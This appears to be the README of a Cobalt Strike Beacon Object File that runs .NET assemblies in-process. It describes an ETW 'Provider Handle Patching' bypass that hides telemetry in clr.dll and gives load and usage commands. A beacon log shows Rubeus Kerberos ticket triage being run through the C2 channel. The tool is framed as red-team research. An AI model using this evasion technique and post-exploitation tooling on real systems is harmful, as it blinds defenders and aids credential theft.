inlineExecute is Cobalt Strike BOF that executes a .NET assembly in the current process (rather than spawning a sacrificial process with execute-assembly).
It stands as a POC, and as a boilerplate to experiment with novel techniques in the future.
Currently, it implements a novel ETW bypass technique: Provider Handle Patching. It is documented in my blog - A Stealthier Reflective Loading.
The Provider Handle Patching technique prevents ETW telemetry from being generated by userland hooks in clr.dll.
Unlike traditional ETW patching techniques. This does not modify memory protections, and does not require suspicious WinAPIs like WriteProcessMemory, NTWriteVirtualMemory, VirtualProtect, NtProtectVirtualMemory.
Load inlineExecute.cna from Cobalt Strike -> Script Manager -> Load. Ensure that inlineExecute.o and inlineExecute.cna are in the same directory.
beacon> inlineExecute
[+] Usage: inlineExecute [-etw] [-verbose] <filepath> <args>The -etw flag patches ETW in clr.dll.
inlineExecute -etw /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
The -verbose flag outputs debugging information.
inlineExecute -verbose -etw /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
Example usage with Rubeus.exe triage.
[11/29 04:08:35] beacon> inlineExecute -etw /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe triage
[11/29 04:08:35] [+] Executing: /home/kali/Tools/Ghostpack-CompiledBinaries/Rubeus.exe
[11/29 04:08:35] [+] Arguments: triage
[11/29 04:08:37] [+] host called home, sent: 459528 bytes
[11/29 04:08:37] [+] received output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
Action: Triage Kerberos Tickets (Current User)
[*] Current LUID : 0x1bc1b
---------------------------------------
| LUID | UserName | Service | EndTime |
---------------------------------------
---------------------------------------
[11/29 04:08:37] [+] received output:
[+] Done